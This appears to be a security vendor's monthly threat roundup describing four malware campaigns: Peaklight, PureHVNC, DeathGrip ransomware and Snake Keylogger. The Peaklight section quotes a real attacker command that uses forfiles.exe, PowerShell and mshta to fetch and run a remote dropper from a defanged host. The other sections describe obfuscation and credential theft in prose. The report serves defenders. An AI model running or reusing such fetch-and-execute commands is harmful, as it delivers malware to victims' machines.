The global cyber threat landscape remains highly elevated, with significant impacts reverberating across organizations of all sizes and sectors. Attackers persistently seek out vulnerable targets, often within industries historically underinvested in cybersecurity defenses. As these malicious actors hone their strategies, the repercussions of each attack become more severe, particularly as they set their sights on higher-value objectives.
Here are the top four threats that have emerged over the past month.
PEAKLIGHT: Decoding the Stealthy Memory-Only Malware
Mandiant has found a malware-as-a-service infostealer delivery campaign powered by a memory-only dropper/downloader, dubbed "Peaklight." Payloads include LUMMAC.V2, ShadowLadder, and CryptBot. What is interesting is that the vector is a .lnk shortcut file that pulls a memory-only obfuscated JavaScript dropper.
As almost always, the chain starts with a user manually downloading, in this case, a .zip file disguised as a pirated movie. The archive has a .lnk file claiming to be the movie. In one variation, the parameters portion of the file leveraged forfiles.exe, a Microsoft utility, to search for win.ini and execute a PowerShell script. The command, forfiles.exe /p C:\Windows /m win.ini /c "powershell . mshta https://nexto max.b- cdn[.]net/nexto" was executed. After this, Windows Media Player opens, and a film studio's opening logo reel is played. A simple video.mp4 file – this looks to be a way to minimize concerns the victim may have about the nature of the download.
The JavaScript dropper itself runs only in memory, which is effective for avoiding many EDR solutions. Decoding happens after assigning decimal-encoded ASCII chars to randomly named variables, with the String.fromCharCode() function converting these characters back to ASCII ones.
There are two variations of the payload, one being Hex-Encoded and the other Base64. For the Hex payload, the first command uses a string of hexadecimal characters to conceal itself. The chain begins with a stealthy Powershell launch with -ep Unrestricted for no execution restrictions, skips loading user profiles, leverages a custom function to transform the string into a byte array (data storage format), creates an AES decryptor using another hex key, and decrypts the byte array to reveal the actual PowerShell commands. This is then executed.
From here, Peaklight itself is running. This is a Powershell downloader that looks for hard-coded filenames and if not present, downloads them to $env:AppData as L1.zip, L2.zip, etc., executes them in alphabetical order, and downloads an image (video.mp4).
These final payloads extract to Setup.exe and LiteSkin Utils.dll/Bentonite.cfg respectively. Setup.exe is actually a Cryptobot infostealer, and Bentonite has malicious configs for Shadowladder. LiteSkinUtils.dll is utilized by Shadowladder for DLL side-loading. Video.mp4 is a legitimate movie trailer to fool the victim.
The use of numerous layers of obfuscation and evasion in this threat campaign underscores the importance of defense-in-depth and knowledge sharing amongst blue teams to best stay in front of such complex, ever-evolving attacks in the current cyber landscape.
PureHVNC
In April, FortiGuard Labs uncovered a sophisticated attack campaign using multiple layers of obfuscation and evasion techniques to distribute VenomRAT via ScrubCrypt. This attack didn't stop with VenomRAT, as subsequent plugins continued deploying various malware into the victim's environment.
More recently a phishing campaign was uncovered that used a similar attack chain and targeted employees by posing as a customer requesting service. This campaign used urgent language to trick victims into opening a malicious HTML attachment, which initiated a complex, multi-stage attack involving various malware, including XWorm, Venom RAT, AsyncRAT, and PureHVNC. The malware in this campaign used advanced packing and obfuscation techniques, including the Python obfuscator "Kramer," the shellcode generator "donut," and the shellcode loader "laZzzy" to evade detection.
The email deceived recipients into opening an HTML attachment. This attachment leveraged the "search-ms" functionality to query a remote LNK file disguised as a PDF icon, which, when executed, ran an obfuscated batch file via conhost.exe. This batch file downloaded additional malicious payloads, including Python programs that used Base64 decoding, RC4 encryption, and shellcode execution to carry out the attack.
The campaign's malware included a .NET application that decrypted and executed payloads using AES and Gzip. This malware also communicated with a C2 server, gathering victim information, and targeting specific applications like crypto wallets and password managers. The malware's plugins, including "PluginRemoteDesktop" and "PluginExecuting," facilitated further attacks, including remote desktop access and execution of additional malicious files.
Overall, this campaign demonstrates the use of complex, multi-layered obfuscation and public hacking tools to deploy a variety of malware, evading detection and targeting sensitive information within the victim's environment.
DeathGrip Ransomware
The rise of DeathGrip ransomware reflects a troubling trend in the cybersecurity landscape, where the barriers to entry for cybercriminals are decreasing. Launched in June 2024, DeathGrip operates as a Ransomware-as-a-Service (RaaS), providing sophisticated ransomware tools, including LockBit 3.0 and Yashma/Chaos builders, to a wide range of users on the dark web. This service allows even those with minimal technical expertise to carry out advanced ransomware attacks, contributing to the commoditization of ransomware.
DeathGrip's operations are heavily promoted through Telegram and underground forums and are rapidly gaining notoriety in the cybercrime community. The ransomware is distributed via self-extracting WinRAR bundles that retrieve and execute payloads from remote servers. These payloads employ AES-256 CGM encryption and are designed with advanced security evasion techniques, such as UAC bypasses and anti-debugger measures, making detection and recovery challenging.
DeathGrip's ransom demands are relatively low, typically ranging from $100 to $1,000, which suggests a strategy focused on a high volume of victims rather than targeting high-value entities. This model has already led to significant disruptions, including an attack on the National Data Center in Indonesia.
The proliferation of such tools has democratized access to ransomware, enabling smaller threat actors to execute attacks previously limited to more sophisticated groups. As these tools become more accessible, the frequency and impact of ransomware attacks are expected to increase, posing a growing challenge for cybersecurity defenses. This highlights the need for advanced security solutions in an increasingly hostile digital environment and for companies to plan defenses capable of detecting and mitigating threats associated with DeathGrip ransomware.
Snake Keylogger Deployed Via Phishing Campaign
Fortinet's FortiGuard Labs recently identified a phishing campaign involving a malicious Excel document attached to emails which delivers a new variant of Snake Keylogger. Also known as "404 Keylogger" or "KrakenKeylogger," Snake Keylogger is a .NET-based, subscription-based keylogger originally sold on hacker forums. It can steal sensitive data, log keystrokes, and capture screenshots once on a victim's computer.
The phishing email lures recipients into opening the malicious Excel document, which downloads and executes the Snake Keylogger using anti-analysis techniques to avoid detection. Decoded JavaScript code executes to download and run an executable file (sahost.exe). This executable extracts, decrypts, loads, and runs the keylogger, using multiple-layer protection techniques to evade cybersecurity products.
The loader module (sahost.exe) employs several methods to protect the core keylogger module, including transformation, encryption, and process hollowing, which injects malicious code into a new process to conceal its origin.
The core module of the Snake Keylogger is fully hidden and capable of collecting various types of private and sensitive information, such as saved credentials, keystrokes, screenshots, and clipboard data.
Collected credentials from over 50 software programs are submitted to the attacker via SMTP, highlighting the keylogger's extensive data theft capabilities.
This is yet another example of how a company is only as strong as its weakest link. Remember to never click on links within emails without first verifying that the link is legitimate by hovering over it and reading the URL. And always report potential phishing emails when you see them, as you were likely not the only one to receive them.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.